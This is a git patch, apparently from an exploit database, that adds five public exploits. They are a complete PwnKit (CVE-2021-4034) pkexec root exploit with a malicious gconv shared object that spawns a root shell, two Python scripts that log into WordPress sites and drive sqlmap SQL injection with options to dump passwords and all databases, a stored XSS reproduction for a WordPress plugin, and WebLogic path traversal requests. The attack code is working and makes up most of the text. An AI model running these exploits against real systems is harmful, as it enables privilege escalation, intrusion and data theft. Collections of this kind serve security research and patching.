From d3b7d652cc5fe777023b44eea9608c70cfd15b90 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 28 Jan 2022 05:01:59 +0000 Subject: [PATCH] DB: 2022-01-28 5 changes to exploits/shellcodes PolicyKit-1 0.105-31 - Privilege Escalation Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion WordPress Plugin Mortgage Calculators WP 1.52 - Stored Cross-Site Scripting (XSS) (Authenticated) WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated) WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated) --- exploits/linux/local/50689.txt | 70 ++++++++++++++ exploits/php/webapps/50685.txt | 20 ++++ exploits/php/webapps/50686.py | 154 ++++++++++++++++++++++++++++++ exploits/php/webapps/50687.py | 73 ++++++++++++++ exploits/windows/remote/50688.txt | 26 +++++ files_exploits.csv | 5 + 6 files changed, 348 insertions(+) create mode 100644 exploits/linux/local/50689.txt create mode 100644 exploits/php/webapps/50685.txt create mode 100755 exploits/php/webapps/50686.py create mode 100755 exploits/php/webapps/50687.py create mode 100644 exploits/windows/remote/50688.txt diff --git a/exploits/linux/local/50689.txt b/exploits/linux/local/50689.txt new file mode 100644 index 000000000..260e3795a --- /dev/null +++ b/exploits/linux/local/50689.txt @@ -0,0 +1,70 @@ +# Exploit Title: PolicyKit-1 0.105-31 - Privilege Escalation +# Exploit Author: Lance Biggerstaff +# Original Author: ryaagard (https://github.com/ryaagard) +# Date: 27-01-2022 +# Github Repo: https://github.com/ryaagard/CVE-2021-4034 +# References: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt + +# Description: The exploit consists of three files `Makefile`, `evil-so.c` & `exploit.c` + +##### Makefile ##### + +all: + gcc -shared -o evil.so -fPIC evil-so.c + gcc exploit.c -o exploit + +clean: + rm -r ./GCONV_PATH=. && rm -r ./evildir && rm exploit && rm evil.so + +################# + +##### evil-so.c ##### + +#include +#include +#include + +void gconv() {} + +void gconv_init() { + setuid(0); + setgid(0); + setgroups(0); + + execve("/bin/sh", NULL, NULL); +} + +################# + +##### exploit.c ##### + +#include +#include + +#define BIN "/usr/bin/pkexec" +#define DIR "evildir" +#define EVILSO "evil" + +int main() +{ + char *envp[] = { + DIR, + "PATH=GCONV_PATH=.", + "SHELL=ryaagard", + "CHARSET=ryaagard", + NULL + }; + char *argv[] = { NULL }; + + system("mkdir GCONV_PATH=."); + system("touch GCONV_PATH=./" DIR " && chmod 777 GCONV_PATH=./" DIR); + system("mkdir " DIR); + system("echo 'module\tINTERNAL\t\t\tryaagard//\t\t\t" EVILSO "\t\t\t2' > " DIR "/gconv-modules"); + system("cp " EVILSO ".so " DIR); + + execve(BIN, argv, envp); + + return 0; +} + +################# \ No newline at end of file diff --git a/exploits/php/webapps/50685.txt b/exploits/php/webapps/50685.txt new file mode 100644 index 000000000..a5d1b19ef --- /dev/null +++ b/exploits/php/webapps/50685.txt @@ -0,0 +1,20 @@ +# Exploit Title: WordPress Plugin Mortgage Calculators WP 1.52 - Stored Cross-Site Scripting (XSS) (Authenticated) +# Date: 25-10-2021 +# Exploit Author: Ceylan Bozogullarindan +# Vendor Homepage: https://lenderd.com/ +# Software Link: https://mortgagecalculatorsplugin.com/ +# Version: 1.52 +# Tested on: Linux +# CVE : CVE-2021-24904 (https://wpscan.com/vulnerability/7b80f89b-e724-41c5-aa03-21d1eef50f21) + + +# Description: +The plugin gives users real-time estimates by providing mortgage calculators. It does not implement any sanitisation on the color value of the background of a calculator in admin panel, which could lead to authenticated Stored Cross-Site Scripting issues. An attacker can execute malicious javascript codes for all visitors of a page containing the calculator. + + +# Steps To Reproduce: +1. Go to settings page available under the "Calculator" menu item. +2. Click the "Select Color" button and type the following payload the input space: `hacked` +3. Click the "Save Changes" button to save settings. +4. Create a new page and add the shortcode ([mcwp type="cv"]) of the calculator, for testing. +5. Visit the page to trigger XSS. \ No newline at end of file diff --git a/exploits/php/webapps/50686.py b/exploits/php/webapps/50686.py new file mode 100755 index 000000000..4f46e5d3c --- /dev/null +++ b/exploits/php/webapps/50686.py @@ -0,0 +1,154 @@ +# Exploit Title: WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated) +# Date 23.01.2022 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://registrationmagic.com/ +# Software Link: https://downloads.wordpress.org/plugin/custom-registration-form-builder-with-submission-manager.5.0.1.5.zip +# Version: <= 5.0.1.5 +# Tested on: Ubuntu 20.04 +# CVE: CVE-2021-24862 +# CWE: CWE-89 +# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24862/README.md + +''' +Description: +The RegistrationMagic WordPress plugin before 5.0.1.6 does not escape user input in its rm_chronos_ajax AJAX action +before using it in a SQL statement when duplicating tasks in batches, which could lead to a SQL injection issue. +''' + +# Banner: +import os + +banner = ''' + + _____ _____ _____ ___ ___ ___ ___ ___ ___ ___ ___ ___ +| | | | __|___|_ | |_ |_ | ___|_ | | | . | _|_ | +| --| | | __|___| _| | | _|_| |_|___| _|_ | . | . | _| +|_____|\___/|_____| |___|___|___|_____| |___| |_|___|___|___| + + [+] RegistrationMagic SQL Injection + [@] Developed by Ron Jost (Hacker5preme) +''' +print(banner) +import string +import argparse +import requests +from datetime import datetime +import random +import json +import subprocess + +# User-Input: +my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +my_parser.add_argument('-u', '--USERNAME', type=str) +my_parser.add_argument('-p', '--PASSWORD', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +wp_path = args.PATH +username = args.USERNAME +password = args.PASSWORD + + +print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) + +# Authentication: +session = requests.Session() +auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' +check = session.get(auth_url) +# Header: +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1' +} + +# Body: +body = { + 'log': username, + 'pwd': password, + 'wp-submit': 'Log In', + 'testcookie': '1' +} +auth = session.post(auth_url, headers=header, data=body) + +# Create task to ensure duplicate: +dupl_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2' + +# Header: +header = { + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", + "Accept-Language": "de,en-US;q=0.7,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "Referer": "http://" + target_ip + ':' + target_port + "/wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2", + "Content-Type": "application/x-www-form-urlencoded", + "Origin": "http://" + target_ip, + "Connection": "close", + "Upgrade-Insecure-Requests": "1", + "Sec-Fetch-Dest": "document", + "Sec-Fetch-Mode": "navigate", + "Sec-Fetch-Site": "same-origin", + "Sec-Fetch-User": "?1" +} + +# Body +body = { + "rmc-task-edit-form-subbed": "yes", + "rm-task-slide": "on", + "rmc_task_name": "Exploitdevelopmenthack" + ''.join(random.choice(string.ascii_letters) for x in range(12)), + "rmc_task_description": "fiasfdhb", + "rmc_rule_sub_time_older_than_age": '', + "rmc_rule_sub_time_younger_than_age": '', + "rmc_rule_fv_fids[]": '', + "rmc_rule_fv_fvals[]": '', + "rmc_rule_pay_status[]": "pending", + "rmc_rule_pay_status[]": "canceled", + "rmc_action_user_acc": "do_nothing", + "rmc_action_send_mail_sub": '', + "rmc_action_send_mail_body": '' +} + +# Create project +a = session.post(dupl_url, headers=header, data=body) + + +# SQL-Injection (Exploit): +exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php' + +# Generate payload for sqlmap +print ('[+] Payload for sqlmap exploitation:') +cookies_session = session.cookies.get_dict() +cookie = json.dumps(cookies_session) +cookie = cookie.replace('"}','') +cookie = cookie.replace('{"', '') +cookie = cookie.replace('"', '') +cookie = cookie.replace(" ", '') +cookie = cookie.replace(":", '=') +cookie = cookie.replace(',', '; ') +exploitcode_url = "sqlmap -u http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php' +exploitcode_risk = ' --level 2 --risk 2 --data="action=rm_chronos_ajax&rm_chronos_ajax_action=duplicate_tasks_batch&task_ids%5B%5D=2"' +exploitcode_cookie = ' --cookie="' + cookie + '"' +print(' Sqlmap options:') +print(' -a, --all Retrieve everything') +print(' -b, --banner Retrieve DBMS banner') +print(' --current-user Retrieve DBMS current user') +print(' --current-db Retrieve DBMS current database') +print(' --passwords Enumerate DBMS users password hashes') +print(' --tables Enumerate DBMS database tables') +print(' --columns Enumerate DBMS database table column') +print(' --schema Enumerate DBMS schema') +print(' --dump Dump DBMS database table entries') +print(' --dump-all Dump all DBMS databases tables entries') +retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') +exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + ' ' + retrieve_mode + ' -p task_ids[] -v 0' +os.system(exploitcode) +print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S'))) \ No newline at end of file diff --git a/exploits/php/webapps/50687.py b/exploits/php/webapps/50687.py new file mode 100755 index 000000000..78c113669 --- /dev/null +++ b/exploits/php/webapps/50687.py @@ -0,0 +1,73 @@ +# Exploit Title: WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated) +# Date 26.01.2022 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://webnus.net/modern-events-calendar/ +# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.6.1.0.zip +# Version: <= 6.1 +# Tested on: Ubuntu 20.04 +# CVE: CVE-2021-24946 +# CWE: CWE-89 +# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24946/README.md + +''' +Description: +The Modern Events Calendar Lite WordPress plugin before 6.1.5 does not sanitise and escape the time parameter +before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users, +leading to an unauthenticated SQL injection issue +''' + +#Banner: +banner = ''' + + .oOOOo. o 'O o.OOoOoo +.O o O o O .oOOo. .oOOo. .oOOo. oO .oOOo. o O .oOOo. o O .oOOo. +o o O o O O o O O O O o O o O o O +o o o ooOO o o O o o o o o o O o o o +o O O' O ooooooooo O' o o O' O ooooooooo O' OooOOo `OooOo OooOOo OoOOo. +O `o o o O O O O o O O O O O O +`o .o `o O O .O o O .O O .O o o o O o + `OoooO' `o' ooOooOoO oOoOoO `OooO' oOoOoO OooOO oOoOoO O `OooO' O `OooO' + + [+] Modern Events Calendar Lite SQL-Injection + [@] Developed by Ron Jost (Hacker5preme) + +''' + +print(banner) + +import requests +import argparse +from datetime import datetime +import os + +# User-Input: +my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calendar SQL-Injection (unauthenticated)') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +wp_path = args.PATH + + +# Exploit: +print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) +print('[*] Payload for SQL-Injection:') +exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=mec_load_single_page&time=2" ' +exploitcode_risk = ' -p time' +print(' Sqlmap options:') +print(' -a, --all Retrieve everything') +print(' -b, --banner Retrieve DBMS banner') +print(' --current-user Retrieve DBMS current user') +print(' --current-db Retrieve DBMS current database') +print(' --passwords Enumerate DBMS users password hashes') +print(' --tables Enumerate DBMS database tables') +print(' --columns Enumerate DBMS database table column') +print(' --schema Enumerate DBMS schema') +print(' --dump Dump DBMS database table entries') +print(' --dump-all Dump all DBMS databases tables entries') +retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') +exploitcode = exploitcode_url + retrieve_mode + exploitcode_risk +os.system(exploitcode) +print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S'))) \ No newline at end of file diff --git a/exploits/windows/remote/50688.txt b/exploits/windows/remote/50688.txt new file mode 100644 index 000000000..3499bd98a --- /dev/null +++ b/exploits/windows/remote/50688.txt @@ -0,0 +1,26 @@ +# Exploit Title: Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion +# Date: 25/1/2022 +# Exploit Author: Jonah Tan (@picar0jsu) +# Vendor Homepage: https://www.oracle.com +# Software Link: +https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html +# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 +# Tested on: Windows Server 2019 +# CVE : CVE-2022-21371 + +# Description +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion +Middleware (component: Web Container). +Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 +and 14.1.1.0.0. +Easily exploitable vulnerability allows unauthenticated attacker with +network access via HTTP to compromise Oracle WebLogic Server. +Successful attacks of this vulnerability can result in unauthorized access +to critical data or complete access to all Oracle WebLogic Server +accessible data. + +# PoC +GET .//META-INF/MANIFEST.MF +GET .//WEB-INF/web.xml +GET .//WEB-INF/portlet.xml +GET .//WEB-INF/weblogic.xml \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 3ab4ef029..e389c6df1 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11433,6 +11433,7 @@ id,file,description,date,author,type,platform,port 50653,exploits/windows/local/50653.txt,"Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass",1970-01-01,hyp3rlinx,local,windows, 50654,exploits/windows/local/50654.txt,"Microsoft Windows Defender - Detections Bypass",1970-01-01,hyp3rlinx,local,windows, 50664,exploits/windows/local/50664.txt,"WorkTime 10.20 Build 4967 - Unquoted Service Path",1970-01-01,"Yehia Elghaly",local,windows, +50689,exploits/linux/local/50689.txt,"PolicyKit-1 0.105-31 - Privilege Escalation",1970-01-01,"Lance Biggerstaff",local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -18599,6 +18600,7 @@ id,file,description,date,author,type,platform,port 50640,exploits/python/remote/50640.py,"Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Jeremiasz Pluta",remote,python, 50652,exploits/windows/remote/50652.txt,"CoreFTP Server build 725 - Directory Traversal (Authenticated)",1970-01-01,LiamInfosec,remote,windows, 50665,exploits/windows/remote/50665.txt,"Archeevo 5.0 - Local File Inclusion",1970-01-01,"Miguel Santareno",remote,windows, +50688,exploits/windows/remote/50688.txt,"Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion",1970-01-01,"Jonah Tan",remote,windows, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, @@ -44762,3 +44764,6 @@ id,file,description,date,author,type,platform,port 50682,exploits/php/webapps/50682.txt,"Online Project Time Management System 1.0 - SQLi (Authenticated)",1970-01-01,"Felipe Alcantara",webapps,php, 50683,exploits/php/webapps/50683.txt,"Online Project Time Management System 1.0 - Multiple Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Felipe Alcantara",webapps,php, 50684,exploits/php/webapps/50684.py,"PHPIPAM 1.4.4 - SQLi (Authenticated)",1970-01-01,"Rodolfo Tavares",webapps,php, +50685,exploits/php/webapps/50685.txt,"WordPress Plugin Mortgage Calculators WP 1.52 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php, +50686,exploits/php/webapps/50686.py,"WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated)",1970-01-01,"Ron Jost",webapps,php, +50687,exploits/php/webapps/50687.py,"WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)",1970-01-01,"Ron Jost",webapps,php,